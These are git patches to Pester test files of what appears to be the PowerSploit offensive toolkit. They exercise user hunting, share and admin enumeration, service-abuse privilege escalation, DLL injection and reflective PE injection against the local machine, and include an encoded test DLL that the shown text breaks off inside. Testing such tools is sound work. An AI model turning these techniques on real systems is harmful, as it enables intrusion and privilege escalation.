         {Invoke-CheckLocalAdminAccess} | Should Not Throw
     }
-    It "Should accept FQDN -ComputerName argument" {
-        {Invoke-CheckLocalAdminAccess -ComputerName "$env:computername.$env:userdnsdomain"} | Should Not Throw
-    }
     It "Should accept NETBIOS -ComputerName argument" {
         {Invoke-CheckLocalAdminAccess -ComputerName "$env:computername"} | Should Not Throw
     }
@@ -315,7 +287,7 @@ Describe "Invoke-CheckLocalAdminAccess" {
         {Invoke-CheckLocalAdminAccess -ComputerName $LocalIP} | Should Not Throw
     }
     It "Should accept pipeline input" {
-        {"$env:computername.$env:userdnsdomain" | Invoke-CheckLocalAdminAccess} | Should Not Throw
+        {"$env:computername" | Invoke-CheckLocalAdminAccess} | Should Not Throw
     }
 }
 
@@ -326,11 +298,6 @@ Describe "Get-LastLoggedOn" {
             Throw "Incorrect loggedon results returned"
         }
     }
-    It "Should accept FQDN -ComputerName argument" {
-        if ( (Get-LastLoggedOn -ComputerName "$env:computername.$env:userdnsdomain" | Measure-Object).count -lt 1) {
-            Throw "Incorrect loggedon results returned"
-        }
-    }
     It "Should accept NETBIOS -ComputerName argument" {
         if ( (Get-LastLoggedOn -ComputerName "$env:computername" | Measure-Object).count -lt 1) {
             Throw "Incorrect loggedon results returned"
@@ -342,7 +309,7 @@ Describe "Get-LastLoggedOn" {
         }
     }
     It "Should accept pipeline input" {
-        {"$env:computername.$env:userdnsdomain" | Get-LastLoggedOn} | Should Not Throw
+        {"$env:computername" | Get-LastLoggedOn} | Should Not Throw
     }
 }
 
@@ -351,9 +318,6 @@ Describe "Get-CachedRDPConnection" {
     It "Should Not Throw" {
         {Get-CachedRDPConnection} | Should Not Throw
     }
-    It "Should accept FQDN -ComputerName argument" {
-        {Get-CachedRDPConnection -ComputerName "$env:computername.$env:userdnsdomain"} | Should Not Throw
-    }
     It "Should accept NETBIOS -ComputerName argument" {
         {Get-CachedRDPConnection -ComputerName "$env:computername"} | Should Not Throw
     }
@@ -361,7 +325,7 @@ Describe "Get-CachedRDPConnection" {
         {Get-CachedRDPConnection -ComputerName $LocalIP} | Should Not Throw
     }
     It "Should accept pipeline input" {
-        {"$env:computername.$env:userdnsdomain" | Get-CachedRDPConnection} | Should Not Throw
+        {"$env:computername" | Get-CachedRDPConnection} | Should Not Throw
     }
 }
 
@@ -372,11 +336,6 @@ Describe "Get-NetProcess" {
             Throw "Incorrect process results returned"
         }
     }
-    It "Should accept FQDN -ComputerName argument" {
-        if ( (Get-NetProcess -ComputerName "$env:computername.$env:userdnsdomain" | Measure-Object).count -lt 1) {
-            Throw "Incorrect process results returned"
-        }
-    }
     It "Should accept NETBIOS -ComputerName argument" {
         if ( (Get-NetProcess -ComputerName "$env:computername" | Measure-Object).count -lt 1) {
             Throw "Incorrect process results returned"
@@ -389,7 +348,7 @@ Describe "Get-NetProcess" {
     }
     # TODO: RemoteUserName/RemotePassword
     It "Should accept pipeline input" {
-        {"$env:computername.$env:userdnsdomain" | Get-NetProcess} | Should Not Throw
+        {"$env:computername" | Get-NetProcess} | Should Not Throw
     }
 }
 
@@ -401,13 +360,13 @@ Describe "Find-InterestingFile" {
 
 Describe "Invoke-UserHunter" {
     It "Should accept -ComputerName argument" {
-        if ( (Invoke-UserHunter -ShowAll -ComputerName "$env:computername.$env:userdnsdomain" | Measure-Object).count -lt 1) {
+        if ( (Invoke-UserHunter -ShowAll -ComputerName "$env:computername" | Measure-Object).count -lt 1) {
             Throw "Insuffient results returned"
         }
     }
     try {
         It "Should accept -ComputerFile argument" {
-            "$env:computername.$env:userdnsdomain","$env:computername.$env:userdnsdomain" | Out-File -Encoding ASCII targets.txt
+            "$env:computername","$env:computername" | Out-File -Encoding ASCII targets.txt
             if ( (Invoke-UserHunter -ComputerFile ".\targets.txt" -ShowAll | Measure-Object).count -lt 1) {
                 Throw "Insuffient results returned"
             }
@@ -417,17 +376,12 @@ Describe "Invoke-UserHunter" {
         Remove-Item -Force ".\targets.txt"
     }
     It "Should accept -NoPing flag" {
-        if ( (Invoke-UserHunter -ComputerName "$env:computername.$env:userdnsdomain" -UserName $env:USERNAME -NoPing | Measure-Object).count -lt 1) {
+        if ( (Invoke-UserHunter -ComputerName "$env:computername" -UserName $env:USERNAME -NoPing | Measure-Object).count -lt 1) {
             Throw "Insuffient results returned"
         }
     }
     It "Should accept -Delay and -Jitter arguments" {
-        if ( (Invoke-UserHunter -ShowAll -Delay 5 -Jitter 0.2 -ComputerName @("$env:computername.$env:userdnsdomain", "$env:computername.$env:userdnsdomain") | Measure-Object).count -lt 1) {
-            Throw "Insuffient results returned"
-        }
-    }
-    It "Should accept pipeline input" {
-        if ( ("$env:computername.$env:userdnsdomain" | Invoke-UserHunter -ShowAll | Measure-Object).count -lt 1) {
+        if ( (Invoke-UserHunter -ShowAll -Delay 5 -Jitter 0.2 -ComputerName @("$env:computername", "$env:computername") | Measure-Object).count -lt 1) {
             Throw "Insuffient results returned"
         }
     }
@@ -437,20 +391,20 @@ Describe "Invoke-UserHunter" {
 Describe "Invoke-StealthUserHunter" {
     # simple test of the splatting
     It "Should accept splatting for Invoke-UserHunter" {
-        {Invoke-StealthUserHunter -ShowAll -ComputerName "$env:computername.$env:userdnsdomain"} | Should Not Throw
+        {Invoke-StealthUserHunter -ShowAll -ComputerName "$env:computername"} | Should Not Throw
     }
 }
 
 
 Describe "Invoke-ProcessHunter" {
     It "Should accept -ComputerName and -UserName arguments" {
-        if ( (Invoke-ProcessHunter -UserName $env:USERNAME -ComputerName "$env:computername.$env:userdnsdomain" | Measure-Object).count -lt 1) {
+        if ( (Invoke-ProcessHunter -UserName $env:USERNAME -ComputerName "$env:computername" | Measure-Object).count -lt 1) {
             Throw "Insuffient results returned"
         }
     }
     try {
         It "Should accept -ComputerFile argument" {
-            "$env:computername.$env:userdnsdomain","$env:computername.$env:userdnsdomain" | Out-File -Encoding ASCII targets.txt
+            "$env:computername","$env:computername" | Out-File -Encoding ASCII targets.txt
             if ( (Invoke-ProcessHunter -ComputerFile ".\targets.txt" -UserName $env:USERNAME | Measure-Object).count -lt 1) {
                 Throw "Insuffient results returned"
             }
@@ -460,14 +414,14 @@ Describe "Invoke-ProcessHunter" {
         Remove-Item -Force ".\targets.txt"
     }
     It "Should accept -ProcessName argument" {
-        if ( (Invoke-ProcessHunter -ComputerName "$env:computername.$env:userdnsdomain" -ProcessName powershell | Measure-Object).count -lt 1) {
+        if ( (Invoke-ProcessHunter -ComputerName "$env:computername" -ProcessName powershell | Measure-Object).count -lt 1) {
             Throw "Insuffient results returned"
         }
     }
     try {
         It "Should accept -UserFile argument" {
             "$env:USERNAME" | Out-File -Encoding ASCII target_users.txt
-            if ( (Invoke-ProcessHunter -ComputerName "$env:computername.$env:userdnsdomain" -UserFile ".\target_users.txt" | Measure-Object).count -lt 1) {
+            if ( (Invoke-ProcessHunter -ComputerName "$env:computername" -UserFile ".\target_users.txt" | Measure-Object).count -lt 1) {
                 Throw "Insuffient results returned"
             }
         }
@@ -476,17 +430,12 @@ Describe "Invoke-ProcessHunter" {
         Remove-Item -Force ".\target_users.txt"
     }
     It "Should accept -NoPing flag" {
-        if ( (Invoke-ProcessHunter -ComputerName "$env:computername.$env:userdnsdomain" -UserName $env:USERNAME -NoPing | Measure-Object).count -lt 1) {
+        if ( (Invoke-ProcessHunter -ComputerName "$env:computername" -UserName $env:USERNAME -NoPing | Measure-Object).count -lt 1) {
             Throw "Insuffient results returned"
         }
     }
     It "Should accept -Delay and -Jitter arguments" {
-        if ( (Invoke-ProcessHunter -UserName $env:USERNAME -Delay 5 -Jitter 0.2 -ComputerName @("$env:computername.$env:userdnsdomain", "$env:computername.$env:userdnsdomain") | Measure-Object).count -lt 1) {
-            Throw "Insuffient results returned"
-        }
-    }
-    It "Should accept pipeline input" {
-        if ( ("$env:computername.$env:userdnsdomain" | Invoke-ProcessHunter -UserName $env:USERNAME | Measure-Object).count -lt 1) {
+        if ( (Invoke-ProcessHunter -UserName $env:USERNAME -Delay 5 -Jitter 0.2 -ComputerName @("$env:computername", "$env:computername") | Measure-Object).count -lt 1) {
             Throw "Insuffient results returned"
         }
     }
@@ -495,13 +444,13 @@ Describe "Invoke-ProcessHunter" {
 
 Describe "Invoke-ShareFinder" {
     It "Should accept -ComputerName argument" {
-        if ( (Invoke-ShareFinder -ComputerName "$env:computername.$env:userdnsdomain" | Measure-Object).count -lt 1) {
+        if ( (Invoke-ShareFinder -ComputerName "$env:computername" | Measure-Object).count -lt 1) {
             Throw "Insuffient results returned"
         }
     }
     try {
         It "Should accept -ComputerFile argument" {
-            "$env:computername.$env:userdnsdomain","$env:computername.$env:userdnsdomain" | Out-File -Encoding ASCII targets.txt
+            "$env:computername","$env:computername" | Out-File -Encoding ASCII targets.txt
             if ( (Invoke-ShareFinder -ComputerFile ".\targets.txt" | Measure-Object).count -lt 1) {
                 Throw "Insuffient results returned"
             }
@@ -511,40 +460,35 @@ Describe "Invoke-ShareFinder" {
         Remove-Item -Force ".\targets.txt"
     }
     It "Should accept -ExcludeStandard argument" {
-        {Invoke-ShareFinder -ComputerName "$env:computername.$env:userdnsdomain" -ExcludeStandard} | Should Not Throw
+        {Invoke-ShareFinder -ComputerName "$env:computername" -ExcludeStandard} | Should Not Throw
     }
     It "Should accept -ExcludePrint argument" {
-        if ( (Invoke-ShareFinder -ComputerName "$env:computername.$env:userdnsdomain" -ExcludePrint | Measure-Object).count -lt 1) {
+        if ( (Invoke-ShareFinder -ComputerName "$env:computername" -ExcludePrint | Measure-Object).count -lt 1) {
             Throw "Insuffient results returned"
         }
     }
     It "Should accept -ExcludeIPC argument" {
-        if ( (Invoke-ShareFinder -ComputerName "$env:computername.$env:userdnsdomain" -ExcludeIPC | Measure-Object).count -lt 1) {
+        if ( (Invoke-ShareFinder -ComputerName "$env:computername" -ExcludeIPC | Measure-Object).count -lt 1) {
             Throw "Insuffient results returned"
         }
     }
     It "Should accept -CheckShareAccess argument" {
-        if ( (Invoke-ShareFinder -ComputerName "$env:computername.$env:userdnsdomain" -CheckShareAccess | Measure-Object).count -lt 1) {
+        if ( (Invoke-ShareFinder -ComputerName "$env:computername" -CheckShareAccess | Measure-Object).count -lt 1) {
             Throw "Insuffient results returned"
         }
     }
     It "Should accept -CheckAdmin argument" {
-        if ( (Invoke-ShareFinder -ComputerName "$env:computername.$env:userdnsdomain" -CheckAdmin | Measure-Object).count -lt 1) {
+        if ( (Invoke-ShareFinder -ComputerName "$env:computername" -CheckAdmin | Measure-Object).count -lt 1) {
             Throw "Insuffient results returned"
         }
     }
     It "Should accept -NoPing argument" {
-        if ( (Invoke-ShareFinder -NoPing -ComputerName "$env:computername.$env:userdnsdomain" | Measure-Object).count -lt 1) {
+        if ( (Invoke-ShareFinder -NoPing -ComputerName "$env:computername" | Measure-Object).count -lt 1) {
             Throw "Insuffient results returned"
         }
     }
     It "Should accept -Delay and -Jitter arguments" {
-        if ( (Invoke-ShareFinder -Delay 5 -Jitter 0.2 -ComputerName @("$env:computername.$env:userdnsdomain", "$env:computername.$env:userdnsdomain") | Measure-Object).count -lt 1) {
-            Throw "Insuffient results returned"
-        }
-    }
-    It "Should accept pipeline input" {
-        if ( ("$env:computername.$env:userdnsdomain" | Invoke-ShareFinder | Measure-Object).count -lt 1) {
+        if ( (Invoke-ShareFinder -Delay 5 -Jitter 0.2 -ComputerName @("$env:computername", "$env:computername") | Measure-Object).count -lt 1) {
             Throw "Insuffient results returned"
         }
     }
@@ -553,11 +497,11 @@ Describe "Invoke-ShareFinder" {
 
 Describe "Invoke-FileFinder" {
     It "Should accept -ComputerName argument" {
-        {Invoke-FileFinder -ComputerName "$env:computername.$env:userdnsdomain"} | Should Not Throw
+        {Invoke-FileFinder -ComputerName "$env:computername"} | Should Not Throw
     }
     try {
         It "Should accept -ComputerFile argument" {
-            "$env:computername.$env:userdnsdomain","$env:computername.$env:userdnsdomain" | Out-File -Encoding ASCII targets.txt        
+            "$env:computername","$env:computername" | Out-File -Encoding ASCII targets.txt        
             {Invoke-FileFinder -ComputerFile ".\targets.txt"} | Should Not Throw
         }
     }
@@ -574,56 +518,53 @@ Describe "Invoke-FileFinder" {
         Remove-Item -Force ".\shares.txt"
     }
     It "Should accept -Terms argument" {
-        {Invoke-FileFinder -Terms secret,testing -ComputerName "$env:computername.$env:userdnsdomain"} | Should Not Throw
+        {Invoke-FileFinder -Terms secret,testing -ComputerName "$env:computername"} | Should Not Throw
     }
     It "Should accept -OfficeDocs argument" {
-        {Invoke-FileFinder -OfficeDocs -ComputerName "$env:computername.$env:userdnsdomain"} | Should Not Throw
+        {Invoke-FileFinder -OfficeDocs -ComputerName "$env:computername"} | Should Not Throw
     }
     It "Should accept -FreshEXEs argument" {
-        {Invoke-FileFinder -FreshEXEs -ComputerName "$env:computername.$env:userdnsdomain"} | Should Not Throw
+        {Invoke-FileFinder -FreshEXEs -ComputerName "$env:computername"} | Should Not Throw
     }
     It "Should accept -LastAccessTime argument" {
-        {Invoke-FileFinder -LastAccessTime "01/01/2000" -ComputerName "$env:computername.$env:userdnsdomain"} | Should Not Throw
+        {Invoke-FileFinder -LastAccessTime "01/01/2000" -ComputerName "$env:computername"} | Should Not Throw
     }
     It "Should accept -LastWriteTime argument" {
-        {Invoke-FileFinder -LastWriteTime "01/01/2000" -ComputerName "$env:computername.$env:userdnsdomain"} | Should Not Throw
+        {Invoke-FileFinder -LastWriteTime "01/01/2000" -ComputerName "$env:computername"} | Should Not Throw
     }
     It "Should accept -ExcludeFolders argument" {
-        {Invoke-FileFinder -ExcludeFolders -ComputerName "$env:computername.$env:userdnsdomain"} | Should Not Throw
+        {Invoke-FileFinder -ExcludeFolders -ComputerName "$env:computername"} | Should Not Throw
     }
     It "Should accept -ExcludeHidden argument" {
-        {Invoke-FileFinder -ExcludeHidden -ComputerName "$env:computername.$env:userdnsdomain"} | Should Not Throw
+        {Invoke-FileFinder -ExcludeHidden -ComputerName "$env:computername"} | Should Not Throw
     }
     It "Should accept -CreationTime argument" {
-        {Invoke-FileFinder -CreationTime "01/01/2000" -ComputerName "$env:computername.$env:userdnsdomain"} | Should Not Throw
+        {Invoke-FileFinder -CreationTime "01/01/2000" -ComputerName "$env:computername"} | Should Not Throw
     }
     It "Should accept -OutFile argument" {
-        {Invoke-FileFinder -ComputerName "$env:computername.$env:userdnsdomain" -OutFile "found_files.csv"} | Should Not Throw
+        {Invoke-FileFinder -ComputerName "$env:computername" -OutFile "found_files.csv"} | Should Not Throw
         if(Test-Path -Path .\found_files.csv) {
             $Null = Remove-Item -Force .\found_files.csv
         }
     }
     It "Should accept -NoPing argument" {
-        {Invoke-FileFinder -NoPing -ComputerName "$env:computername.$env:userdnsdomain"} | Should Not Throw
+        {Invoke-FileFinder -NoPing -ComputerName "$env:computername"} | Should Not Throw
     }
     It "Should accept -Delay and -Jitter arguments" {
-        {Invoke-FileFinder -Delay 5 -Jitter 0.2 -ComputerName @("$env:computername.$env:userdnsdomain","$env:computername.$env:userdnsdomain")} | Should Not Throw
-    }
-    It "Should accept pipeline input" {
-        {"$env:computername.$env:userdnsdomain" | Invoke-FileFinder} | Should Not Throw
+        {Invoke-FileFinder -Delay 5 -Jitter 0.2 -ComputerName @("$env:computername","$env:computername")} | Should Not Throw
     }
 }
 
 
 Describe "Find-LocalAdminAccess" {
     It "Should accept -ComputerName argument" {
-        if ( (Find-LocalAdminAccess -ComputerName "$env:computername.$env:userdnsdomain" | Measure-Object).count -lt 1) {
+        if ( (Find-LocalAdminAccess -ComputerName "$env:computername" | Measure-Object).count -lt 1) {
             Throw "Insuffient results returned"
         }
     }
     try {
         It "Should accept -ComputerFile argument" {
-            "$env:computername.$env:userdnsdomain","$env:computername.$env:userdnsdomain" | Out-File -Encoding ASCII targets.txt
+            "$env:computername","$env:computername" | Out-File -Encoding ASCII targets.txt
             if ( (Find-LocalAdminAccess -ComputerFile ".\targets.txt" | Measure-Object).count -lt 1) {
                 Throw "Insuffient results returned"
             }
@@ -633,17 +574,12 @@ Describe "Find-LocalAdminAccess" {
         Remove-Item -Force ".\targets.txt"
     }
     It "Should accept -NoPing argument" {
-        if ( (Find-LocalAdminAccess -NoPing -ComputerName "$env:computername.$env:userdnsdomain" | Measure-Object).count -lt 1) {
+        if ( (Find-LocalAdminAccess -NoPing -ComputerName "$env:computername" | Measure-Object).count -lt 1) {
             Throw "Insuffient results returned"
         }
     }
     It "Should accept -Delay and -Jitter arguments" {
-        if ( (Find-LocalAdminAccess -Delay 5 -Jitter 0.2 -ComputerName @("$env:computername.$env:userdnsdomain","$env:computername.$env:userdnsdomain") | Measure-Object).count -lt 1) {
-            Throw "Insuffient results returned"
-        }
-    }
-    It "Should accept pipeline input" {
-        if ( ("$env:computername.$env:userdnsdomain" | Find-LocalAdminAccess | Measure-Object).count -lt 1) {
+        if ( (Find-LocalAdminAccess -Delay 5 -Jitter 0.2 -ComputerName @("$env:computername","$env:computername") | Measure-Object).count -lt 1) {
             Throw "Insuffient results returned"
         }
     }
@@ -652,13 +588,13 @@ Describe "Find-LocalAdminAccess" {
 
 Describe "Invoke-EnumerateLocalAdmin" {
     It "Should accept -ComputerName argument" {
-        if ( (Invoke-EnumerateLocalAdmin -ComputerName "$env:computername.$env:userdnsdomain" | Measure-Object).count -lt 1) {
+        if ( (Invoke-EnumerateLocalAdmin -ComputerName "$env:computername" | Measure-Object).count -lt 1) {
             Throw "Insuffient results returned"
         }
     }
     try {
         It "Should accept -ComputerFile argument" {
-            "$env:computername.$env:userdnsdomain","$env:computername.$env:userdnsdomain" | Out-File -Encoding ASCII targets.txt
+            "$env:computername","$env:computername" | Out-File -Encoding ASCII targets.txt
             if ( (Invoke-EnumerateLocalAdmin -ComputerFile ".\targets.txt" | Measure-Object).count -lt 1) {
                 Throw "Insuffient results returned"
             }
@@ -668,23 +604,18 @@ Describe "Invoke-EnumerateLocalAdmin" {
         Remove-Item -Force ".\targets.txt"
     }
     It "Should accept -NoPing argument" {
-        if ( (Invoke-EnumerateLocalAdmin -NoPing -ComputerName "$env:computername.$env:userdnsdomain" | Measure-Object).count -lt 1) {
+        if ( (Invoke-EnumerateLocalAdmin -NoPing -ComputerName "$env:computername" | Measure-Object).count -lt 1) {
             Throw "Insuffient results returned"
         }
     }
     It "Should accept -Delay and -Jitter arguments" {
-        if ( (Invoke-EnumerateLocalAdmin -Delay 5 -Jitter 0.2 -ComputerName @("$env:computername.$env:userdnsdomain","$env:computername.$env:userdnsdomain") | Measure-Object).count -lt 1) {
+        if ( (Invoke-EnumerateLocalAdmin -Delay 5 -Jitter 0.2 -ComputerName @("$env:computername","$env:computername") | Measure-Object).count -lt 1) {
             Throw "Insuffient results returned"
         }
     }
     It "Should accept -Outfile argument" {
-        Invoke-EnumerateLocalAdmin -ComputerName "$env:computername.$env:userdnsdomain" -OutFile "local_admins.csv"
+        Invoke-EnumerateLocalAdmin -ComputerName "$env:computername" -OutFile "local_admins.csv"
         ".\local_admins.csv" | Should Exist
         Remove-Item -Force .\local_admins.csv
     }
-    It "Should accept pipeline input" {
-        if ( ("$env:computername.$env:userdnsdomain" | Invoke-EnumerateLocalAdmin | Measure-Object).count -lt 1) {
-            Throw "Insuffient results returned"
-        }
-    }
 }
-- 
cgit v1.2.3


From 9ffc26af70ae089405a5c5e8df40ad557818c103 Mon Sep 17 00:00:00 2001
From: Harmj0y <will@harmj0y.net>
Date: Mon, 14 Dec 2015 19:33:15 -0500
Subject: Added admin rights check for existing Privesc Pester tests

---
 Tests/Privesc.tests.ps1 | 46 +++++++++++++++++++++++++++++++++++++++++++++-
 1 file changed, 45 insertions(+), 1 deletion(-)

(limited to 'Tests')

diff --git a/Tests/Privesc.tests.ps1 b/Tests/Privesc.tests.ps1
index 6593c84..095c946 100644
--- a/Tests/Privesc.tests.ps1
+++ b/Tests/Privesc.tests.ps1
@@ -18,6 +18,10 @@ function Get-RandomName {
     return ('abcdefghijklmnopqrstuvwxyz'[$r] -join '')
 }
 
+function Test-IsAdmin {
+    return ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")
+}
+
 
 ########################################################
 #
@@ -79,11 +83,16 @@ Describe 'Get-ModifiableFile' {
 
 Describe 'Get-ServiceUnquoted' {
 
+    if(-not $(Test-IsAdmin)) { 
+        Throw "'Get-ServicePermission' Pester test needs local administrator privileges."
+    }
+
     It "Should not throw." {
         {Get-ServiceUnquoted} | Should Not Throw
     }
 
     It 'Should return service with a space in an unquoted binPath.' {
+
         $ServiceName = Get-RandomName
         $ServicePath = "C:\Program Files\service.exe"
 
@@ -115,6 +124,10 @@ Describe 'Get-ServiceUnquoted' {
 
 Describe 'Get-ServiceFilePermission' {
 
+    if(-not $(Test-IsAdmin)) { 
+        Throw "'Get-ServiceFilePermission' Pester test needs local administrator privileges."
+    }
+
     It 'Should not throw.' {
         {Get-ServiceFilePermission} | Should Not Throw
     }
@@ -155,6 +168,10 @@ Describe 'Get-ServiceFilePermission' {
 
 Describe 'Get-ServicePermission' {
 
+    if(-not $(Test-IsAdmin)) { 
+        Throw "'Get-ServicePermission' Pester test needs local administrator privileges."
+    }
+
     It 'Should not throw.' {
         {Get-ServicePermission} | Should Not Throw
     }
@@ -193,7 +210,11 @@ Describe 'Get-ServiceDetail' {
 ########################################################
 
 Describe 'Invoke-ServiceAbuse' {
-    
+
+    if(-not $(Test-IsAdmin)) { 
+        Throw "'Invoke-ServiceAbuse' Pester test needs local administrator privileges."
+    }
+
     BeforeEach {
         $ServicePath = "$(Get-Location)\$([IO.Path]::GetRandomFileName())" + ".exe"
         $Null = sc.exe create "PowerUpService" binPath= $ServicePath
@@ -255,6 +276,10 @@ Describe 'Invoke-ServiceAbuse' {
 
 Describe 'Install-ServiceBinary' {
 
+    if(-not $(Test-IsAdmin)) { 
+        Throw "'Install-ServiceBinary' Pester test needs local administrator privileges."
+    }
+
     BeforeEach {
         $ServicePath = "$(Get-Location)\powerup.exe"
         $Null | Out-File -FilePath $ServicePath -Force
@@ -363,6 +388,10 @@ Describe 'Find-DLLHijack' {
 
 Describe 'Find-PathHijack' {
 
+    if(-not $(Test-IsAdmin)) { 
+        Throw "'Find-PathHijack' Pester test needs local administrator privileges."
+    }
+
     It 'Should find a hijackable %PATH% folder.' {
 
         New-Item -Path C:\PowerUpTest\ -ItemType directory -Force
@@ -422,6 +451,11 @@ Describe 'Get-RegAutoLogon' {
 
 
 Describe 'Get-VulnAutoRun' {
+
+    if(-not $(Test-IsAdmin)) { 
+        Throw "'Get-VulnAutoRun' Pester test needs local administrator privileges."
+    }
+
     It 'Should not throw.' {
         {Get-VulnAutoRun} | Should Not Throw
     }
@@ -451,6 +485,11 @@ Describe 'Get-VulnAutoRun' {
 ########################################################
 
 Describe 'Get-VulnSchTask' {
+
+    if(-not $(Test-IsAdmin)) { 
+        Throw "'Get-VulnSchTask' Pester test needs local administrator privileges."
+    }
+
     It 'Should not throw.' {
         {Get-VulnSchTask} | Should Not Throw
     }
@@ -476,6 +515,11 @@ Describe 'Get-VulnSchTask' {
 
 
 Describe 'Get-UnattendedInstallFile' {
+
+    if(-not $(Test-IsAdmin)) { 
+        Throw "'Get-UnattendedInstallFile' Pester test needs local administrator privileges."
+    }
+
     It 'Should not throw.' {
         {Get-UnattendedInstallFile} | Should Not Throw
     }
-- 
cgit v1.2.3


From 924103aa015be3e8838c2a9bacb5194fe5984226 Mon Sep 17 00:00:00 2001
From: Matt Graeber <mattgraeber@gmail.com>
Date: Mon, 14 Dec 2015 20:43:51 -0800
Subject: Invoke-DllInjection Pester test improvement

The test dll I now use is advpack.dll since that is present in all
versions of windows.
---
 Tests/CodeExecution.tests.ps1 | 14 +++++++-------
 1 file changed, 7 insertions(+), 7 deletions(-)

(limited to 'Tests')

diff --git a/Tests/CodeExecution.tests.ps1 b/Tests/CodeExecution.tests.ps1
index b8e415e..2771e78 100644
--- a/Tests/CodeExecution.tests.ps1
+++ b/Tests/CodeExecution.tests.ps1
@@ -125,19 +125,19 @@ Describe 'Invoke-Shellcode' {
 }
 
 Describe 'Invoke-DllInjection' {
-	$Accessibilitycpl = 'accessibilitycpl.dll'
-	$AccessibilitycplPath = "$($Env:SystemRoot)\System32\$Accessibilitycpl"
+	$Advpack = 'advpack.dll'
+	$AdvpackPath = "$($Env:SystemRoot)\System32\$Advpack"
 
 	It 'should inject a known system DLL' {
-		if (-not (Test-Path $AccessibilitycplPath)) {
-			throw "$AccessibilitycplPath does not exist on disk."
+		if (-not (Test-Path $AdvpackPath)) {
+			throw "$AdvpackPath does not exist on disk."
 		}
 		
-		$LoadedModule = Invoke-DllInjection -ProcessID $PID -Dll $AccessibilitycplPath
+		$LoadedModule = Invoke-DllInjection -ProcessID $PID -Dll $AdvpackPath
 		$LoadedModule | Should Not BeNullOrEmpty
 
 		$LoadedModule -is [System.Diagnostics.ProcessModule] | Should Be $True
-		$LoadedModule.ModuleName | Should Be $Accessibilitycpl
+		$LoadedModule.ModuleName | Should Be $Advpack
 	}
 
 	It 'should not inject a non-existent DLL' {
@@ -149,7 +149,7 @@ Describe 'Invoke-DllInjection' {
 	}
 
 	It 'should not inject to a non-existent process' {
-		{ Invoke-DllInjection -ProcessID 0 -Dll $AccessibilitycplPath } | Should Throw
+		{ Invoke-DllInjection -ProcessID 0 -Dll $AdvpackPath } | Should Throw
 	}
 }
 
-- 
cgit v1.2.3


From 98ebc1b0b8b64d069d34d80c128aa226b5e8416f Mon Sep 17 00:00:00 2001
From: Matt Graeber <mattgraeber@gmail.com>
Date: Thu, 17 Dec 2015 18:50:15 -0800
Subject: Invoke-ReflectivePEInjection test harnesses updated

Affected test harness PEs were updated to work in XP. Addresses issue
#100
---
 Tests/CodeExecution.tests.ps1 | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

(limited to 'Tests')

diff --git a/Tests/CodeExecution.tests.ps1 b/Tests/CodeExecution.tests.ps1
index 2771e78..514cb91 100644
--- a/Tests/CodeExecution.tests.ps1
+++ b/Tests/CodeExecution.tests.ps1
@@ -225,11 +225,11 @@ Describe 'Invoke-ReflectivePEInjection' {
 
 	# A bare bones test harness DLL that simply writes "Hello, world!" to %TEMP%\testoutput.txt upon having VoidFunc called
 	$Encoded64BitVoidDll = 'TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAyAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABxqgfBNctpkjXLaZI1y2mSPLP6kjbLaZI1y2iSM8tpkheyjZI0y2mSF7K1kjTLaZIXsreSNMtpklJpY2g1y2mSAAAAAAAAAABQRQAAZIYDAKZ8PlYAAAAAAAAAAPAAIiALAgwAAAIAAAAEAAAAAAAAABAAAAAQAAAAAACAAQAAAAAQAAAAAgAABQACAAAAAAAFAAIAAAAAAABAAAAABAAAlVEAAAEAYAEAABAAAAAAAAAQAAAAAAAAAAAQAAAAAAAAEAAAAAAAAAAAAAAQAAAAkCAAAF0AAADwIAAAKAAAAAAAAAAAAAAAADAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAADgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAudGV4dAAAACUBAAAAEAAAAAIAAAAEAAAAAAAAAAAAAAAAAAAgAABgLnJkYXRhAADIAQAAACAAAAACAAAABgAAAAAAAAAAAAAAAAAAQAAAQC5wZGF0YQAADAAAAAAwAAAAAgAAAAgAAAAAAAAAAAAAAAAAAEAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALgBAAAAw8zMzMzMzMzMzMxMi9xTSIHsYAEAAIsFFxAAAPIPEAUXEAAASI0NLBAAAEGJQwgPtwUBEAAA8g8RRCRAZkGJQwwPtgXxDwAAQYhDDosF8Q8AAIlEJEgPtwXqDwAAZolEJEz/FasPAABIjRXcDwAASIvI/xWTDwAASIvYSIXAD4STAAAASI1UJFBIjYwkcAEAAEG4AgEAAP8VXg8AAIXAdHZMjQW7DwAASI1MJFC6AgEAAP/ThcB1X0jHRCQwAAAAAESNQAdIjUwkUEUzyboAAABAx0QkKIAAAADHRCQgAgAAAP8VOw8AAEiL2EiFwHQnRTPJSI1UJEBIi8hFjUEOSMdEJCAAAAAA/xX1DgAASIvL/xUEDwAASIHEYAEAAFvDAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA